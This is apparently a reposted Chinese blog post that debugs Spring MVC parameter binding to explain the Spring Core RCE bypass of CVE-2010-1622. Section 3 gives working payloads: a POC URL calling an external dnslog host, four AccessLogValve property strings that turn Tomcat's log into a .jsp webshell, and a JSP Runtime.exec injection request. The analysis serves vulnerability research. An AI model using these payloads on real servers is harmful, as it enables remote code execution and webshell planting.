既然Spring最新0day漏洞是绕过CVE-2010-1622的修复方式后产生的，那就从这个古老漏洞的本质：参数绑定入手，搭建环境进行调试。

1 Spring参数绑定

 首先了解下什么是Spring中的参数绑定，简单来说，springmvc中通过方法形参来接收页面请求的key/value数据，经过参数绑定，将key/value数据绑定到controller方法的形参上。

1.1 基本类型绑定

  首先举个例子，如果我们要实现这样一个基本的注册功能：

 需要先写一个User的POJO类/Bean类，包含基本的get/set方法：

  然后Controller类接负责收前台传输的三个String类型参数，这里如果不使用@RequestParam，要求request传入参数名称和controller方法的形参名称一致，方可绑定成功。如果使用@RequestParam，则不需要。

  中间封装一层Service，调用User类set方法实现赋值，完成参数绑定，如形参email对应User类email属性，并把数据传入数据库。

 最终在View层完成视图渲染，这样就完成了一个典型的SpringMVC开发。

1.2 对象绑定

  形参除了上述使用基本类型外，还可以直接使用POJO类。

  直接新增一个controller方法，形参为User实体，然后获取其值并打印：

 下面我们访问 http://127.0.0.1:8080/test?name=123，发现成功取到了值123，但代码里我们明明没有调用user.setName方法。

 这是因为spring mvc提供的字段映射功能会自动发现对象中的public方法和字段，如果提交的参数中出现了user类的一个public字段或方法，就自动绑定，并且允许用户提交请求给他赋值。

2  参数绑定流程

  参数绑定的整个流程如下图所示：

   要搞清楚漏洞原理我们需要搞清两个问题：

1）Spring是怎么找到Controller的方法并执行的？

2）获取到方法后如何获取到参数并进行参数绑定的？

 我们在spring的总入口DispatcherServlet.java的doDispatch方法处加上断点，一步步跟踪：

2.1 如何执行controller的方法？

1）用户请求经过tomcat处理后，调用Spring总入口DispatcherServlet.java的doDispath方法来路由处理http请求：

2）首先通过getHandler根据传入的request从容器中找到相应的handler,关键代码：

ha.handle(processedRequest, response, mappedHandler.getHandler());

3）通过HandlerAdapter的handle方法，进行统一调用，然后返回ModelAndView对象：

invokeHandlerMethod——>invokeAndHandle——>invokeForRequest——>doInvoke

 最终spring调用的是java.lang.reflect.Method类的invoke方法，两个关键参数：

• target是UserController中的execute方法

• args是刚刚解析出来的user对象

  这样就清楚了Spring是如何执行controller中的方法的。

2.2 如何进行参数绑定？

1）在invokeForRequest中，执行doInvoke方法之前先执行了getMethodArgumentValues操作，即参数相关操作：

resolveArgument——>bindRequestParameters——bind——>doBind

2）doBind方法具体实现数据绑定：

applyPropertyValues——>setPropertyValues——>setPropertyValue

  setPropertyValue调用递归函数getPropertyAccessorForPropertyPath获取参数值，循环查看参数中是否包含“.”,若存在则按“.”分割赋值给nestedProperty，pos为nestedProperty值的长度：

  如，如果我们发出请求http://127.0.0.1:8080/test?name.jayway，则第一次取到的nestedProperty即为name，pos为4：

  如果取到nestedProperty，则将其带到下面的数据流处理：

getNestedPropertyAccessor——>getPropertyValue——>getLocalPropertyHandler

   重点来了，这里会调用：

BeanWrapperImpl#getCachedIntrospectionResults().getPropertyDescriptor(propertyName)

 去这个缓存cache里去找我们输入的参数propertyName（即nestedProperty属性）是否在User的属性列表里，查看一下这个property列表，除了自动获取的User类的public方法和属性外，竟然还自带了一个class属性：

 这意味着，通过这个接口我们不仅可以操作User类，也可以操作任意class，换句话说，下面如果获取到classLoader那我们就可以执行任意对象，继续访问：http://127.0.0.1:8080/test?class.classLoader.xxxxx

  成功通过第一层判断，再次走到getPropertyAccessorForPropertyPath，第二次取值为classLoader，这次缓存列表里共有46个值，并不包含classLoader：

 但存在module，JDK9及以上版本可以通过class.module.classLoader获取classLoader，继续调试，发现classLoader可获取：

 继续：class.module.classLoader.xxx

 继续：class.module.classLoader.sources.xxx

  继续：class.module.classLoader.sources.context，成功获取到tomcat的context对象，下面漏洞利用的姿势就很多了。

  获取到context具体对象后最后会走到getValue：

  getValue中通过反射调用对象，完成整个数据绑定流程。这样漏洞原理也就清楚了，剩下的就是构造合适的利用链。

3 漏洞利用

3.1 POC调试

 以configFile为例，展开可见其最终调用的方法为org.apache.catalina.core.StandardContext#getConfigFile

 具体方法为：

 因此我们请求下面的链接即可触发一次URL请求：

http://127.0.0.1:8080/rce?class.module.classLoader.resources.context.configFile=http://spring-jayway.b0ul4q.dnslog.cn/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx

 这个请求相当于执行了:

user.getclass().getclassLoader().getResources().getContext().getconFile()

 完整调用链：

3.2 EXP调试

   任意访问内部属性的漏洞场景，和CVE-2014-0094非常相似，可以直接借鉴其通过日志写shell思路：

https://securityintelligence.com/struts-vulnerabilities-analysis-parameters-cookie-interceptors-impact-exploitation/

  而经过上面调试，发现class.module.classLoader.sources.context可调用parent，即StandardContext的父类ContainerBase：

 访问ContainerBase的Pipeline属性：

 Pipeline的getFirst方法可获取Valve接口，有多种实现，包括AccessLogValve，这个类包含access日志的相关属性：

  通过修改日志文件的这四个配置，包括目录、后缀，我们就可以完成在日志文件中插入恶意jsp代码达到RCE：

  对应四个请求如下，依次访问即可成功修改日志属性：日志名改为jayway.jsp，目录改为tomcat根目录：

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

class.module.classLoader.resources.context.parent.pipeline.first.directory=C:/tomcat/webapp/ROOT/

class.module.classLoader.resources.context.parent.pipeline.first.prefix=jayway

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

  访问http://127.0.0.1:8080/aaaa.jsp?a=<% Runtime.getRuntime().exec("calc");%>将恶意代码写入日志文件，访问日志文件jayway.jsp即可触发命令执行：

  Tomcat场景下漏洞利用方式不唯一，具体要看通过classLoader调用的类，危害不限于文件操作、DOS、网络请求（SSRF）、dos等。

4 漏洞总结

4.1 漏洞发现思路

  这个漏洞和CVE-2010-1622在本质上是一致的，都是由于对象参数的自动绑定引起，关键在于绑定过程中对象自带了class属性，导致用户可以访问任意class。

 同时JDK9以上存在class.module.classLoader，可绕过CVE-2010-1622的黑名单从而获取到classLoader，通过这个classLoader可访问到tomcat的context对象，最终任意修改tomcat内部属性，达成写webshell、dos等危害。

4.2 RCE前提

• JDK版本>=9 （这个版本才能取到classLoader）

• 使用对象绑定方式 （基本类型绑定场景不影响）

• 使用Tomcat容器 （如果使用的是springboot，只能取到springboot的classLoader）

5 Refer：

https://www.inbreak.net/archives/377

https://blog.csdn.net/dingodingy/article/details/84705444

https://securityintelligence.com/struts-vulnerabilities-analysis-parameters-cookie-interceptors-impact-exploitation/

原文始发于微信公众号（卓文见识）：Spring Core-RCE深入分析及步步调试出payload